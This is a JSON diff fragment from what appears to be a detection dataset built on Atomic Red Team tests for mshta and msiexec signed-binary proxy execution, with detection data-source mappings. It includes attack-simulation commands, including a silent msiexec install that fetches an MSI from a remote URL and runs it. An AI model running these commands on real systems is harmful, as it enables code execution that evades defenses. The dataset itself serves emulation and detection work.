+ "description": "Executes an HTA Application with Simulate lateral movement over UNC Path.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "mshta_file_path": { + "description": "Location of mshta.exe", + "type": "String", + "default": 
"$env:windir\\system32\\mshta.exe" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}", + "name": "powershell" + } + }, + { + "name": "Mshta used to Execute PowerShell", + "auto_generated_guid": "8707a805-2b76-4f32-b1c0-14e558205772", + "description": "Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "message": { + "description": "Encoded message to include", + "type": "String", + "default": "Hello,%20MSHTA!" 
+ }, + "seconds_to_sleep": { + "description": "How many seconds to sleep/wait", + "type": "Integer", + "default": 5 + } + }, + "executor": { + "command": "mshta.exe \"about:'\"\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null + ] + }, + { + "technique_id": "T1218.007", + "command_list": [ + "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi\"\n", + "msiexec.exe /q /i \"#{msi_payload}\"\n", + "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi\"\n", + "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi\"\n", + "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi\"\n", + "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi' }\n", + "Invoke-CimMethod -ClassName Win32_Product -MethodName Install -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi' }\n", + "Invoke-CimMethod -ClassName Win32_Product 
-MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi' }\n", + "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi' }\n", + "msiexec.exe /y \"PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll\"\n", + "msiexec.exe /z \"PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll\"\n", + "msiexec.exe /q /i \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi\"\n" + ], + "commands": [ + { + "command": "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /q /i \"#{msi_payload}\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi' }\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy 
Execution: Msiexec" + }, + { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName Install -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi' }\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi' }\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi' }\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /y \"PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /z \"PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /q /i \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.007", + "display_name": 
"Signed Binary Proxy Execution: Msiexec", + "atomic_tests": [ + { + "name": "Msiexec.exe - Execute Local MSI file with embedded JScript", + "auto_generated_guid": "a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04", + "description": "Executes an MSI containing embedded JScript code using msiexec.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "i" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /q /#{action} \"#{msi_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Msiexec.exe - Execute Local MSI file with embedded VBScript", + "auto_generated_guid": "8d73c7b0-c2b1-4ac1-881a-4aa644f76064", + "description": "Executes an MSI containing embedded VBScript code using msiexec.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: i (install), a (admin), j (advertise). 
The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "i" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /q /#{action} \"#{msi_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Msiexec.exe - Execute Local MSI file with an embedded DLL", + "auto_generated_guid": "628fa796-76c5-44c3-93aa-b9d8214fd568", + "description": "Executes an MSI containing an embedded DLL using msiexec.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: i (install), a (admin), j (advertise). 
